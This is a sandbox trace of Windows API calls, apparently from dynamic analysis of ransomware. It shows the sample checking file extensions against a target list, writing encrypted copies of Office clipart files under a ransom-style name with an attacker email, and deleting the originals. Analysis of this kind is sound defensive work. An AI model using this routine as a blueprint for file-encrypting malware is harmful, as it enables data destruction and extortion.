	[0145.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.118] lstrlenW (lpString=".dbf") returned 4
	[0145.118] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.118] lstrlenW (lpString=".1cd") returned 4
	[0145.118] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.118] lstrlenW (lpString=".jpg") returned 4
	[0145.118] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.118] lstrlenW (lpString=".doc") returned 4
	[0145.119] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.119] lstrlenW (lpString=".docx") returned 5
	[0145.119] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.119] lstrlenW (lpString=".pdf") returned 4
	[0145.119] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.119] lstrlenW (lpString=".xls") returned 4
	[0145.119] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.119] lstrlenW (lpString=".xlsx") returned 5
	[0145.119] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.119] lstrlenW (lpString=".ppt") returned 4
	[0145.119] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.119] lstrlenW (lpString=".zip") returned 4
	[0145.119] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.119] lstrlenW (lpString=".rar") returned 4
	[0145.119] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.119] lstrlenW (lpString=".bz2") returned 4
	[0145.119] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.119] lstrlenW (lpString=".7z") returned 3
	[0145.119] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.119] lstrlenW (lpString=".dbf") returned 4
	[0145.119] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.119] lstrlenW (lpString=".1cd") returned 4
	[0145.119] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.119] lstrlenW (lpString=".jpg") returned 4
	[0145.119] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.119] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.120] lstrlenW (lpString="DD01366_.WMF") returned 12
	[0145.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.128] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1768) returned 1
	[0145.128] CloseHandle (hObject=0x3d4) returned 1
	[0145.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf")) returned 0x20
	[0145.129] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.129] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.129] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.130] GetLastError () returned 0x0
	[0145.130] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x6e8, lpOverlapped=0x0) returned 1
	[0145.131] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x6f0, lpOverlapped=0x0) returned 1
	[0145.132] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.132] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.132] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.132] CloseHandle (hObject=0x3d8) returned 1
	[0145.132] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.132] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.134] CloseHandle (hObject=0x3d4) returned 1
	[0145.134] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.135] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf")) returned 1
	[0145.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.135] lstrlenW (lpString=".doc") returned 4
	[0145.135] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.135] lstrlenW (lpString=".docx") returned 5
	[0145.135] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.135] lstrlenW (lpString=".pdf") returned 4
	[0145.135] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.135] lstrlenW (lpString=".xls") returned 4
	[0145.135] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.135] lstrlenW (lpString=".xlsx") returned 5
	[0145.135] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.135] lstrlenW (lpString=".ppt") returned 4
	[0145.135] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.135] lstrlenW (lpString=".zip") returned 4
	[0145.135] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.135] lstrlenW (lpString=".rar") returned 4
	[0145.136] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.136] lstrlenW (lpString=".bz2") returned 4
	[0145.136] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.136] lstrlenW (lpString=".7z") returned 3
	[0145.136] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.136] lstrlenW (lpString=".dbf") returned 4
	[0145.136] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.136] lstrlenW (lpString=".1cd") returned 4
	[0145.136] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.136] lstrlenW (lpString=".jpg") returned 4
	[0145.136] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.136] lstrlenW (lpString=".doc") returned 4
	[0145.136] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.136] lstrlenW (lpString=".docx") returned 5
	[0145.136] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.136] lstrlenW (lpString=".pdf") returned 4
	[0145.136] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.136] lstrlenW (lpString=".xls") returned 4
	[0145.136] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.136] lstrlenW (lpString=".xlsx") returned 5
	[0145.136] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.136] lstrlenW (lpString=".ppt") returned 4
	[0145.136] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.136] lstrlenW (lpString=".zip") returned 4
	[0145.136] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.136] lstrlenW (lpString=".rar") returned 4
	[0145.136] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.136] lstrlenW (lpString=".bz2") returned 4
	[0145.137] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.137] lstrlenW (lpString=".7z") returned 3
	[0145.137] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.137] lstrlenW (lpString=".dbf") returned 4
	[0145.137] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.137] lstrlenW (lpString=".1cd") returned 4
	[0145.137] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63
	[0145.137] lstrlenW (lpString=".jpg") returned 4
	[0145.137] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.137] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.137] lstrlenW (lpString="DD01585_.WMF") returned 12
	[0145.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.138] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2524) returned 1
	[0145.138] CloseHandle (hObject=0x3d4) returned 1
	[0145.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf")) returned 0x20
	[0145.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.138] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.138] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.139] GetLastError () returned 0x0
	[0145.139] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x9dc, lpOverlapped=0x0) returned 1
	[0145.140] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x9e0, lpOverlapped=0x0) returned 1
	[0145.141] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.141] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.141] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.141] CloseHandle (hObject=0x3d8) returned 1
	[0145.141] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.141] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.143] CloseHandle (hObject=0x3d4) returned 1
	[0145.143] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.143] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf")) returned 1
	[0145.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.144] lstrlenW (lpString=".doc") returned 4
	[0145.144] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.144] lstrlenW (lpString=".docx") returned 5
	[0145.144] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.144] lstrlenW (lpString=".pdf") returned 4
	[0145.144] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.144] lstrlenW (lpString=".xls") returned 4
	[0145.144] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.144] lstrlenW (lpString=".xlsx") returned 5
	[0145.144] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.144] lstrlenW (lpString=".ppt") returned 4
	[0145.144] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.144] lstrlenW (lpString=".zip") returned 4
	[0145.144] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.144] lstrlenW (lpString=".rar") returned 4
	[0145.144] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.144] lstrlenW (lpString=".bz2") returned 4
	[0145.144] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.144] lstrlenW (lpString=".7z") returned 3
	[0145.145] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.145] lstrlenW (lpString=".dbf") returned 4
	[0145.145] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.145] lstrlenW (lpString=".1cd") returned 4
	[0145.145] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.145] lstrlenW (lpString=".jpg") returned 4
	[0145.145] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.145] lstrlenW (lpString=".doc") returned 4
	[0145.145] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.145] lstrlenW (lpString=".docx") returned 5
	[0145.145] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.145] lstrlenW (lpString=".pdf") returned 4
	[0145.145] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.145] lstrlenW (lpString=".xls") returned 4
	[0145.145] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.145] lstrlenW (lpString=".xlsx") returned 5
	[0145.145] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.145] lstrlenW (lpString=".ppt") returned 4
	[0145.145] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.145] lstrlenW (lpString=".zip") returned 4
	[0145.145] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.145] lstrlenW (lpString=".rar") returned 4
	[0145.145] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.145] lstrlenW (lpString=".bz2") returned 4
	[0145.145] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.145] lstrlenW (lpString=".7z") returned 3
	[0145.145] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.146] lstrlenW (lpString=".dbf") returned 4
	[0145.146] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.146] lstrlenW (lpString=".1cd") returned 4
	[0145.146] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63
	[0145.146] lstrlenW (lpString=".jpg") returned 4
	[0145.146] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.146] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.146] lstrlenW (lpString="DD01586_.WMF") returned 12
	[0145.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.146] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2324) returned 1
	[0145.146] CloseHandle (hObject=0x3d4) returned 1
	[0145.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf")) returned 0x20
	[0145.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.147] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.147] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.148] GetLastError () returned 0x0
	[0145.148] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x914, lpOverlapped=0x0) returned 1
	[0145.335] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x920, lpOverlapped=0x0) returned 1
	[0145.353] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.353] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.353] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.353] CloseHandle (hObject=0x3d8) returned 1
	[0145.353] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.353] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.355] CloseHandle (hObject=0x3d4) returned 1
	[0145.355] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.355] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf")) returned 1
	[0145.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.356] lstrlenW (lpString=".doc") returned 4
	[0145.356] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.356] lstrlenW (lpString=".docx") returned 5
	[0145.356] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.356] lstrlenW (lpString=".pdf") returned 4
	[0145.356] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.356] lstrlenW (lpString=".xls") returned 4
	[0145.356] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.356] lstrlenW (lpString=".xlsx") returned 5
	[0145.356] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.356] lstrlenW (lpString=".ppt") returned 4
	[0145.356] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.356] lstrlenW (lpString=".zip") returned 4
	[0145.356] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.356] lstrlenW (lpString=".rar") returned 4
	[0145.356] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.356] lstrlenW (lpString=".bz2") returned 4
	[0145.357] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.357] lstrlenW (lpString=".7z") returned 3
	[0145.357] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.357] lstrlenW (lpString=".dbf") returned 4
	[0145.357] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
